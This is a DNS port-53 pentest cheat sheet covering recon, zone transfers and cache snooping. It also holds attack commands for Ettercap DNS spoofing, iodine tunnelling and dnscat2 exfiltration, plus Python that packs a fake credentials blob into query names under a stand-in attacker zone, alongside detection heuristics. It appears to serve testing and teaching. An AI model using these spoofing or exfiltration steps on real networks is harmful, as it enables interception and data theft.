
DNS Pentest - Port 53


Recon


Banner Grabbing - Identify DNS Server Versions

# Use dig to ask for the BIND version string (CHAOS class, TXT type; many servers hide it with version "none")
dig version.bind CHAOS TXT @<DNS_IP>

# Alternatively, use the nmap dns-nsid script, which asks for the NSID option, id.server and version.bind over UDP/53
nmap -sU -p 53 --script dns-nsid <DNS_IP>

# A raw UDP connection only opens a socket: DNS has no greeting banner, and the server stays silent
# until it receives a well-formed query, so the "banner" is always the answer to a query you send
nc -nv -u <DNS_IP> 53

DNS Server Discovery

# Using dig
dig NS <target-domain>

# Using nslookup
nslookup -type=NS <target-domain>



Enumeration


Using DNS enum

# Query the target nameserver directly; -p 0 -s 0 disable Google scraping, -f is the brute-force wordlist, -o saves the results
dnsenum --dnsserver <DNS_IP> --enum -p 0 -s 0 -o subdomains.txt -f <WORDLIST> <DOMAIN>


Using dig

# Query DNS records
dig hackviser.com

# Query a specific type of DNS record (e.g., A record)
dig A hackviser.com

# Perform a reverse DNS lookup
dig -x <IP_ADDRESS>

# Query a specific DNS server
dig @<DNS_SERVER_IP> hackviser.com

Using nslookup

# Perform DNS queries
nslookup hackviser.com

# Query a specific type of DNS record (e.g., MX record)
nslookup -type=MX hackviser.com

# Query a specific DNS server
nslookup hackviser.com <DNS_IP>

Using host

# Perform DNS query
host hackviser.com

# Query a specific type of DNS record (e.g., MX record)
host -t MX hackviser.com

# Perform a reverse DNS lookup
host <IP_ADDRESS>

Any Record Query

# Ask for every record type at once. Many resolvers now refuse ANY or answer it minimally (RFC 8482, typically a
# single HINFO record), so fall back to querying the individual types when the response looks empty
dig any hackviser.com @<DNS_IP>

Zone Transfer

# Without a zone name dig requests a transfer of the root zone ("."), which no server will hand out,
# so in practice you need the zone name first (from NS/SOA records, reverse lookups or guessing)
dig axfr @<DNS_IP>

# With the zone name
dig axfr @<DNS_IP> <DOMAIN>

# Alternatively, use fierce: it tries a zone transfer against each nameserver and falls back to a dictionary attack
fierce --domain <DOMAIN> --dns-servers <DNS_IP>

Metasploit Modules and Nmap Scripts

# Metasploit
msfconsole
use auxiliary/gather/enum_dns

# Nmap: default DNS scripts plus forward-confirmed reverse DNS, SRV enumeration and the txid/source-port randomization checks
nmap -n --script "(default and *dns*) or fcrdns or dns-srv-enum or dns-random-txid or dns-random-srcport" <IP>

# Find DNS servers on a range and run the vuln/vulners scripts against them
nmap --script vuln,vulners --script-args mincvss=7.0 -sC -sV -p 53 --open 10.10.0.0/16

# Discovery and vuln scripts over UDP, skipping DoS and brute-force scripts
nmap -sU -sV --script "dns* and (discovery or vuln) and not (dos or brute)" -p 53 10.10.10.10

# Does the server answer recursive queries for arbitrary names (open resolver)?
nmap -Pn -p 53 -sU --script dns-recursion 10.10.10.10

# Cache snooping: which names has the server resolved recently?
nmap -Pn -sU -sV -p 53 --script dns-cache-snoop 10.10.10.10

# DNS enumeration and amplification check via Metasploit
use auxiliary/gather/enum_dns
use auxiliary/scanner/dns/dns_amp

# Reverse lookup with nslookup: point it at the target nameserver, then ask for the hostname of an IP
nslookup
> server 10.10.10.1
> 10.10.10.10
10.10.10.10.in-addr.arpa name = host02.test.domain.

# AXFR transfers a zone, not a single host record: request the zone the hostname belongs to (test.domain)
dig axfr test.domain @10.10.10.1


DNS Reverse and Subdomain Brute Force

# Reverse (PTR) lookups over a range, sent to the target nameserver
dnsrecon -r 127.0.0.0/24 -n <IP_DNS>
dnsrecon -r 127.0.1.0/24 -n <IP_DNS>
dnsrecon -r <IP_DNS>/24 -n <IP_DNS>

# Standard enumeration of a domain plus a zone transfer attempt (-a)
dnsrecon -d active.htb -a -n <IP_DNS>


DNS Cache Snooping

# Querying the DNS cache with dnsrecon: -t snoop sends a non-recursive query for each name in the -D list
# to the given nameserver (-t std is the standard SOA/NS/MX/A enumeration and does not snoop the cache)
dnsrecon -t snoop -n <DNS_IP> -D /usr/share/dnsrecon/namelist.txt

DNS Enumeration with Google Dorks

# Collecting DNS information using Google dorks: everything indexed under the domain except the main site
site:hackviser.com -www.hackviser.com -site:www.hackviser.com

DNS Hacking tools

DNS Dumpster
DNS Recon
Spyse
SecurityTrails
DNSlytics
CertSpotter (certificate transparency search, used for subdomain enumeration)


Attack Vectors


DNS Spoofing
Poisoning with Ettercap

# ARP-poison the path between gateway and target and answer the victim's DNS queries with the dns_spoof plugin.
# The plugin serves the entries defined in etter.dns (e.g. /etc/ettercap/etter.dns), so add the names to spoof there first
ettercap -T -q -M arp:remote /<gateway-ip>// /<target-ip>// -P dns_spoof

DNS Tunneling

# Server side: runs on the host that the NS record of <domain> delegates to, reachable on UDP/53.
# -f stays in the foreground, -c disables the client IP/port check, <tunnel-ip> is the server end of the tun interface
iodined -f -c <tunnel-ip> <domain>

# Client side: <dns-server-ip> is the resolver the client is allowed to reach; if it is omitted iodine uses the system resolver.
# Traffic is then routed over the tun interface inside DNS queries for <domain>
iodine <dns-server-ip> <domain>

Post-Exploitation


Cache Snooping

# Non-recursive query: a NOERROR reply that carries records means the server already had <domain> in its cache
# (someone behind it resolved the name recently); an empty answer section or REFUSED means it did not
dig @<dns-server> <domain> +norecurse
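The version.bind banner grab in the Recon section and the +norecurse check above are the same operation at wire level: one query, one reply, and a decision made from the reply's header bits and answer section. The following Python is an added example (not code from the original page, nor from dig, nmap or dnsrecon): it builds the query packet that a bare nc connection never sends, parses the reply including compression pointers, extracts the TXT string, and applies the cache-snooping rule. Every reply below is constructed sample bytes so the module runs offline; query_udp() is the only live call, and the server, names, TTL and the 9.11.3 version string are invented for the demo.

```python
"""DNS wire-format helpers for the query-based checks in this cheat sheet.

Added example (not code from the page, dig, nmap or dnsrecon). build_query() makes the
packet that `nc -u` alone never sends; is_cached() applies the `dig +norecurse` rule.
All replies below are constructed samples; only query_udp() touches the network.
"""
import random
import socket
import struct
from typing import Optional

TYPE_A, TYPE_TXT = 1, 16
CLASS_IN, CLASS_CHAOS = 1, 3


def build_query(name: str, qtype: int, qclass: int = CLASS_IN, rd: bool = True,
                txid: Optional[int] = None) -> bytes:
    """Single-question DNS query. rd=False clears the RD bit (non-recursive, for snooping)."""
    txid = random.randrange(1, 0xFFFF) if txid is None else txid
    flags = 0x0100 if rd else 0x0000                      # QR=0, OPCODE=0, RD is bit 0x0100
    header = struct.pack("!HHHHHH", txid, flags, 1, 0, 0, 0)
    qname = b"".join(bytes([len(lbl)]) + lbl.encode() for lbl in name.rstrip(".").split("."))
    return header + qname + b"\x00" + struct.pack("!HH", qtype, qclass)


def read_name(msg: bytes, off: int):
    """Decode a possibly compressed name at off; return (dotted name, offset after it)."""
    labels, jumped, end = [], False, off
    while True:
        ln = msg[off]
        if ln & 0xC0 == 0xC0:                             # 2-byte compression pointer
            ptr = struct.unpack("!H", msg[off:off + 2])[0] & 0x3FFF
            if not jumped:
                end = off + 2
            off, jumped = ptr, True
            continue
        off += 1
        if ln == 0:
            break
        labels.append(msg[off:off + ln].decode())
        off += ln
    return ".".join(labels) + ".", (end if jumped else off)


def parse_response(msg: bytes) -> dict:
    """Header bits plus the answer section as (name, type, class, ttl, raw rdata) tuples."""
    txid, flags, qd, an, _ns, _ar = struct.unpack("!HHHHHH", msg[:12])
    off = 12
    for _ in range(qd):                                   # skip the echoed question(s)
        _, off = read_name(msg, off)
        off += 4
    answers = []
    for _ in range(an):
        name, off = read_name(msg, off)
        rtype, rclass, ttl, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
        off += 10
        answers.append((name, rtype, rclass, ttl, msg[off:off + rdlen]))
        off += rdlen
    return {"id": txid, "rcode": flags & 0xF, "aa": bool(flags & 0x0400),
            "ra": bool(flags & 0x0080), "answers": answers}


def txt_strings(rdata: bytes) -> list:
    """Split TXT RDATA (<len><chars>...) into its character-strings."""
    out, i = [], 0
    while i < len(rdata):
        n = rdata[i]
        out.append(rdata[i + 1:i + 1 + n].decode(errors="replace"))
        i += 1 + n
    return out


def is_cached(resp: dict) -> bool:
    """Verdict for a reply to an RD=0 query: NOERROR, at least one answer, AA clear.
    AA set means the server is authoritative for the name, which says nothing about its cache."""
    return resp["rcode"] == 0 and bool(resp["answers"]) and not resp["aa"]


def query_udp(server: str, name: str, qtype: int, qclass: int = CLASS_IN,
              rd: bool = True, timeout: float = 3.0) -> dict:
    """Send one query over UDP/53 and parse the reply (live use only; not exercised by the samples)."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(build_query(name, qtype, qclass, rd), (server, 53))
        data, _ = s.recvfrom(4096)
    return parse_response(data)


def _reply(query: bytes, flags: int, answer_rrs: bytes, ancount: int) -> bytes:
    """Constructed reply: reuse the query's ID and question, set flags and ANCOUNT."""
    return query[:2] + struct.pack("!HHHHH", flags, 1, ancount, 0, 0) + query[12:] + answer_rrs


# Constructed samples (no real server was involved). 0xC00C points back to the question name at offset 12.
BIND_QUERY = build_query("version.bind", TYPE_TXT, CLASS_CHAOS, txid=0x1337)
BIND_REPLY = _reply(BIND_QUERY, 0x8580,                       # QR, AA, RD, RA
                    b"\xc0\x0c" + struct.pack("!HHIH", TYPE_TXT, CLASS_CHAOS, 0, 7) + b"\x069.11.3", 1)

SNOOP_QUERY = build_query("www.example.com", TYPE_A, rd=False, txid=0x4242)
A_RR = b"\xc0\x0c" + struct.pack("!HHIH", TYPE_A, CLASS_IN, 1234, 4) + bytes([93, 184, 216, 34])
CACHED_REPLY = _reply(SNOOP_QUERY, 0x8080, A_RR, 1)           # QR, RA; AA clear; TTL already counting down
NOT_CACHED_REPLY = _reply(SNOOP_QUERY, 0x8080, b"", 0)        # NOERROR but nothing in the answer section
AUTHORITATIVE_REPLY = _reply(SNOOP_QUERY, 0x8480, A_RR, 1)    # AA set: an authoritative answer, not a cache hit
```

Against a live target the two checks are `txt_strings(query_udp("<DNS_IP>", "version.bind", TYPE_TXT, CLASS_CHAOS)["answers"][0][4])` and `is_cached(query_udp("<DNS_IP>", "<domain>", TYPE_A, rd=False))`. Two caveats the samples illustrate: a resolver that refuses RD=0 queries answers with RCODE 5 (REFUSED), which is_cached reports as "not cached" rather than as an error, and a TTL in a cached answer is the remaining lifetime, so comparing it with the zone's original TTL tells you roughly when the name was last looked up.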

Reverse DNS Lookup

dig -x <ip-address>

Exfiltration with dnscat2

# Server side (Ruby): listens on UDP/53 as the authoritative server for <domain>
ruby dnscat2.rb <domain>

# Client side: tunnels through the local resolver by default; set server= to talk to the dnscat2 server directly
# when <domain> is not delegated to it (the traffic is then no longer hidden inside ordinary recursive resolution)
./dnscat --dns domain=<domain>,server=<dns-server-ip>,port=53
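Both iodine and dnscat2 above work under the same constraint: outbound data has to be carried in query names, which means at most 63 bytes per label, about 253 characters per name, and a case-insensitive alphabet. The following Python is an added example (not code from the page, nor the framing that iodine or dnscat2 actually use): a minimal client/server pair that base32-packs a payload into sequenced query names under an attacker zone, reassembles it, and the per-query and per-zone heuristics a defender would run over DNS logs to spot it. The zone, payload and detection thresholds are constructed for the demo.

```python
"""How a DNS tunnel/exfil client packs bytes into query names, and what that looks like to a defender.

Added example; not the framing used by iodine or dnscat2. The zone, payload and thresholds are constructed.
"""
import base64
import math
from collections import Counter

MAX_LABEL = 63      # RFC 1035 label limit
MAX_NAME = 253      # printable FQDN limit
SEQ_LEN = 5         # hex sequence label so the server can reorder queries that arrive out of order


def chunk_size(domain: str) -> int:
    """Base32 characters that fit in one name of the form <seq>.<label>...<label>.<domain>."""
    labels = (MAX_NAME - SEQ_LEN - 1 - len(domain)) // (MAX_LABEL + 1)
    return labels * MAX_LABEL


def encode_chunks(data: bytes, domain: str) -> list:
    """Client side: base32 (lowercase, unpadded, since resolvers may fold case), split into query names."""
    text = base64.b32encode(data).decode().rstrip("=").lower()
    size = chunk_size(domain)
    names = []
    for seq, i in enumerate(range(0, len(text), size)):
        piece = text[i:i + size]
        labels = [piece[j:j + MAX_LABEL] for j in range(0, len(piece), MAX_LABEL)]
        names.append(".".join([f"{seq:0{SEQ_LEN}x}"] + labels + [domain]))
    return names


def decode_chunks(names: list, domain: str) -> bytes:
    """Server side: strip the zone, order by sequence number, re-pad and base32-decode."""
    pieces = {}
    for name in names:
        seq, *labels = name[:-len(domain) - 1].split(".")
        pieces[int(seq, 16)] = "".join(labels)
    text = "".join(pieces[k] for k in sorted(pieces))
    return base64.b32decode(text + "=" * (-len(text) % 8), casefold=True)


def entropy(s: str) -> float:
    """Shannon entropy in bits per character."""
    counts = Counter(s)
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())


def looks_like_tunnel(name: str, zone: str) -> bool:
    """Per-query heuristic on the part below the zone: long, many labels, or high entropy.
    Short tail chunks slip through (see QUERIES[1] below), so pair it with unique_subdomains()."""
    name = name.rstrip(".")
    if not name.endswith("." + zone):
        return False
    labels = name[:-len(zone) - 1].split(".")
    joined = "".join(labels)
    return len(joined) > 50 or len(labels) >= 4 or (len(joined) >= 16 and entropy(joined) > 3.5)


def unique_subdomains(names: list, zone: str) -> int:
    """Volume signal: distinct names queried under one zone. A tunnel produces thousands, a web app a handful."""
    return len({n.rstrip(".") for n in names if n.rstrip(".").endswith("." + zone)})


# Constructed sample: a fake credentials blob leaving the network under a constructed attacker zone.
ZONE = "tun.example.com"
PAYLOAD = (b"user=svc_backup;pass=Winter2024!;host=db01.corp.internal;"
           b"note=exported from /opt/backup/.pgpass on 2024-05-01 03:12:44 UTC\n")
QUERIES = encode_chunks(PAYLOAD, ZONE)
```

With a 15-character zone each name carries 189 base32 characters (about 118 payload bytes), so the 123-byte sample needs two queries; the second one is short enough that the per-query heuristic misses it, which is why the volume count per zone matters in detection. For the same reason the query names in real tunnels are worth logging in full: the payload is recoverable from them, exactly as decode_chunks() does here.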
